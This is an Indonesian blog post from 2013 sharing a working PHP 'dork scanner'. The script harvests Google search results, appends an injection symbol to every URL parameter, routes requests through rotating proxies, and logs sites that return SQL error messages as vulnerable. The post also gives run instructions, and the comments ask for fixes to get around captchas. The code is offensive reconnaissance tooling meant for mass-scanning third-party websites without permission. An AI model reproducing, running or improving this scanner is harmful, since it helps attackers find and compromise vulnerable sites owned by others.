
Selasa, 28 Mei 2013

Simple Sqli Dork Scanner

ijin share dork scan punya ane
mohon dikembangkan lagi gan

<?php
//Coded by RieqyNS13
//Greeting to Allah swt and all devilzc0de.org members
class rieqyns13{
    // Search query handed to Google (line endings are stripped in scandork()).
    public $dork;
    // Upper bound on the number of result URLs fetched and tested; scandork() keeps
    // looping while its per-URL counter is <= this value.
    public $jumlah;
    // String that parse() appends to the value of every query parameter
    // (the "simbol/key" read from stdin by the script below).
    public $key;
    // Path of the file simpan() appends matching URLs to.
    public $simpan;
 // When true, cekurls() keeps only the first URL seen per host on a result page.
 public $hapus_yg_sama;
 // When true, graph() sends every request through a proxy chosen by proxy().
 public $proxy;
 // Path of the proxy list read by proxy(); one host:port per line.
 public $proxy_file;
    // Browser strings intended for CURLOPT_USERAGENT. graph() passes array_rand() of
    // this array to curl, and array_rand() returns a key (0..9), so the User-Agent header
    // that is actually sent is that index, not one of these strings.
    private $useragent = array(
        'Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
        'Opera/9.25 (Windows NT 5.1; U; en)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
        'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:50',
        'Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16 20:21:10',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6'
    );
    // Returns every substring of $var that lies between the literal markers $start and
    // $end (non-greedy, first capture group), or null when nothing matches.
    // The pattern is delimited by "|" and preg_quote() is called without that delimiter
    // argument, so the markers themselves must not contain "|".
    function match($start, $end, $var){
        return preg_match_all("|".preg_quote($start).'(.*?)'.preg_quote($end)."|", $var, $m) ? $m[1] : null;
    }
    // Fetches one page over cURL and returns the response body (false on failure).
    // scandork() uses two call shapes: ($dork, $offset, null) builds a Google search URL
    // for result offset $offset; (null, null, $url) fetches $url as given. Any other
    // combination sets no URL at all, and curl_exec() then fails.
    function graph($dork=null, $x, $url=null){
        $ch = curl_init();
        if($dork != null && is_numeric($x)){
            // Note the literal "&amp;" is an HTML entity, so the query string sent is
            // "q=...&amp;ie=UTF-8&start=N" exactly as written here.
            curl_setopt($ch, CURLOPT_URL, "http://www.google.com/search?q=".urlencode($dork)."&amp;ie=UTF-8&start=".urlencode($x));
        }elseif($url != null && $x==null){
            curl_setopt($ch, CURLOPT_URL, $url);
        }
  // Plain (non-CONNECT) proxying. proxy() returns a message string rather than an
  // address when the list file is missing, and that string is what curl receives here.
  if($this->proxy==true){
   curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, false);
   curl_setopt($ch, CURLOPT_PROXY, $this->proxy());
  }
        // array_rand() yields an index, so the header value is a digit (see $useragent).
        curl_setopt($ch, CURLOPT_USERAGENT, array_rand($this->useragent));
        // Certificate verification is off: HTTPS peers (and any proxy) are not authenticated.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_AUTOREFERER, true );
        // 15 s each for the whole transfer and for connecting.
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
        $exec = curl_exec($ch);
        curl_close($ch);
        return $exec;
    }
 // Picks a random line from $proxy_file and strips its line ending. When the file does
 // not exist the return value is an Indonesian message ("no file ..., please create it
 // first") rather than a proxy address; callers do not check for this.
 function proxy(){
  if(@is_file($this->proxy_file)){
   $file = file($this->proxy_file);
   return str_replace(array("\n", "\r", "\r\n"), "", $file[array_rand($file)]);
  }else return "tidak ada file {$this->proxy_file}, tolong buat dulu";
 }
    // Rebuilds $url with $this->key appended to the value of every query parameter.
    // A URL without a query string is returned unchanged. Only scheme, host and path are
    // kept; port, user info and fragment are dropped. parse_str() rewrites "." and " " in
    // parameter names to "_", so names can differ from the original beyond the added key.
    // Side effect: strips line endings from $this->key on the object.
    function parse($url){
        $this->key = str_replace(array("\n", "\r", "\r\n"), "", $this->key);
        $arr = parse_url($url);
        if(empty($arr['query'])){
            return $url;
        }    
        parse_str($arr['query'], $ar);
        $key = array_keys($ar);
        foreach($key as $a){
            $x[] = $a."=".$ar[$a].$this->key;
            }
        $imp = implode("&", $x);
        return $arr['scheme']."://".$arr['host'].$arr['path']."?".$imp;
    }
    // Appends $url plus a newline to the file named by $this->simpan.
    // fopen() failure is not checked.
    function simpan($url){
        $fp = fopen($this->simpan, "a");
        fwrite($fp, $url."\n");
        fclose($fp);
    }
 // Filters a list of result URLs. With $hapus_yg_sama false the list is returned as is.
 // With it true each URL is split into scheme/host/path/query and only the first URL
 // per distinct host is rebuilt and returned. When no URL could be parsed (for example
 // an empty result page) an error marker is echoed and nothing is returned (null).
 function cekurls($urls){
  $urlv = null;
  if($this->hapus_yg_sama==false) return $urls;
  elseif($this->hapus_yg_sama==true){
   for($a=0; $a<count($urls); $a++){
    $dev = parse_url($urls[$a]);
    // "@" hides the notice when a component is absent from parse_url()'s result.
    @$scheme[] = $dev['scheme'];
    @$host[] = $dev['host'];
    if(empty($dev['path'])) $path[] = null;
    elseif(!empty($dev['path'])) $path[] = $dev['path'];
    if(empty($dev['query'])) $prm[] = null;
    elseif(!empty($dev['query'])) $prm[] = $dev['query'];
   }
   if(isset($host)){
   // array_unique() keeps the key of the first occurrence of each host, which is
   // used below to look up that URL's other components.
   $unik = array_unique($host);
   foreach($unik as $key=>$url){
    if(!empty($prm[$key])){
     $prm = "?".$prm[$key];
    }elseif(empty($prm[$key])) $prm = null;
    $urlv[] = $scheme[$key]."://".$url.$path[$key].$prm;
   }
   return $urlv;
   }elseif(!isset($host) && $this->proxy==false) echo "[Error] ";
   elseif(!isset($host) && $this->proxy==true) echo "[Proxy mungkin tidak valid] ";
  }
 }
    // Main loop. Pages through Google results for $this->dork, runs each result URL
    // through parse(), fetches it, and labels it "vuln" when the response body matches
    // the error-message regex below (those URLs are also written via simpan()).
    // Stops once the per-URL counter exceeds $this->jumlah. Progress and timing are
    // echoed to stdout in Indonesian.
    function scandork(){
        $dork = $this->dork;
        $dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
        $start=0;
        $jumlah=0;
        $page=0;
  $total=0;
        while($jumlah<=$this->jumlah){
            $a=0;
            $graph = $this->graph($dork, $start, null);
            // Markers correspond to the Google results markup at the time of writing;
            // the capture is the target URL up to "&amp;sa=U".
            $match = $this->match('<h3 class="r"><a href="/url?q=', '&amp;sa=U&amp;', $graph);
   $cekurls = $this->cekurls($match);
            if(count($cekurls)==0){
                echo "hasil tidak ada atau ada halangan captcha :p\n";
                // "continue" re-enters the loop with $start unchanged, so the same
                // results page is requested again.
                continue;
            }
            $mulai = time();
            foreach($cekurls as $url){
                $urlp = $this->parse(urldecode($url));
                $graph = $this->graph(null, null, $urlp);
                // Text-only check for verbose database/PHP error output in the response;
                // it does not confirm anything beyond the presence of these strings.
                // On the serving side, disabling display_errors and returning generic
                // error pages removes this signal entirely.
                if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph)){
                    echo "vuln -> ".urldecode($urlp)."\n";
                    $this->simpan($urlp);
                    $a++;
                }else{
                    echo "NOT vuln - > ".urldecode($urlp)."\n";
                }
                $jumlah++;
            }
            // Each unit is round()ed from the same elapsed seconds, not a h:m:s
            // breakdown: 40 s is reported as 0 jam 1 menit 40 detik.
            $selang = time() - $mulai;
            $detik = round($selang);
            $menit = round($selang / 60);
            $jam = round($selang / 3600);
   $start=$start+count($cekurls);
            $page++;
            echo "Selesai scan page {$page} dalam : {$jam} jam {$menit} menit {$detik} detik\n\n";
        }
        echo "Jumlah situs yang discan {$jumlah}\n";
        
    }
    
}
// Script entry: reads the dork and the key from stdin (both keep their trailing
// newline here; the class strips it), sets the options below and starts the scan.
echo "simple dork scanner by rieqyns13\n\n";
$dc = new rieqyns13;
echo "Masukkan dork = ";
$fp = fopen("php://stdin", "rb"); // the dork
$str = fgets($fp);
echo "Masukkan simbol/key = "; // symbol inserted into the url
$key = fgets($fp);
fclose($fp);
///OPTION///////////////////////////////////
$dc->hapus_yg_sama = true; // true to drop URLs with the same host on each page, false to keep them
$dc->proxy = true; // true to use the proxies listed in $dc->proxy_file, false to connect directly
$dc->proxy_file = "proxylist.txt"; // used when $dc->proxy=true; each proxy in the file must be written as -> proxy:port . example "914.143.141.131:8080"
$dc->jumlah = 300; // number of sites to scan
////////////////////////////////////////////
$dc->dork = $str;
$dc->key = $key;
// Matching URLs are appended to this file.
$dc->simpan = "url_vuln.txt";
$dc->scandork();
?>
copas ke notepad trus simpan dgn extensi php, trus buka cmd, masuk ke path dmana taruh file php tadi, trus jalanin pke printah php scan.php, dgn syarat path nya harus udah ditambahin/diatur ke c:\xampp\php


dan ini gambar jika menggunakan proxy
tuh berarti proxy yg dipke harus bener2 FRESH dan tahan lama, jika tidak, maka beberapa url atau bahkan semua url tidak bisa digraph.
skarang penjelasan selanjutnya.
tuh konsep dari dork scanner ane,  jika url ada parameter tertentu kya gini misal:
http://site.com/detail.php?id=2&next.asp?cat=21&gay.cfm?id=null
ntar dirubah ke
http://site.com/detail.php?id=2'&next_asp?cat=21'&gay_cfm?id=null'

sesuai dengan simbol yg dimasukkan.
jika url tidak ada parameter kya di atas, akan direturn ke url aslinya
ane cuman bisa nangkep site vuln berdasarkan pesan sql error pada umumnya gan, jadi site keluar gak terlalu banyak. ni gan buat ngecek apakah tuh site vuln ato kagak
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph))
pngalam ane klo keseringan pke dork yg kompleks, biasanya diblock ama captcha gan
mohon dikembangin lagi biar bisa menjadi tool yg advanced gan


bisa kasih tutor yang detil gan, masih bingung nih, udah simpan .php , pas di cmd commandnya gimana?

klo udah nginstall xampp, di cmd tulis kya gini:

c:\xampp\php\php.exe file.php

saya save dg nama index.php di c:\xampp\htdocs\

di cmd saya ketik c:\xampp\htdocs\php.exe index.php

tidak bisa apa yg salah ya gan

error yg muncul apa emang ??
curl_init() bla bla bla ??

Hey bro, found you on hf. First of all great work on your simple sqli scanner and happy festive season and sorry to bother you. But it seems that the input captcha is broken probably due to some google update. I am no longer able to view or enter it due to some script error.
Also for some reason, it is unable to detect vulnerable asp sqli errors even the most obvious ones. Any chance you can update and fix the bugs? Your efforts are really appreciated :) and keep up the great work.

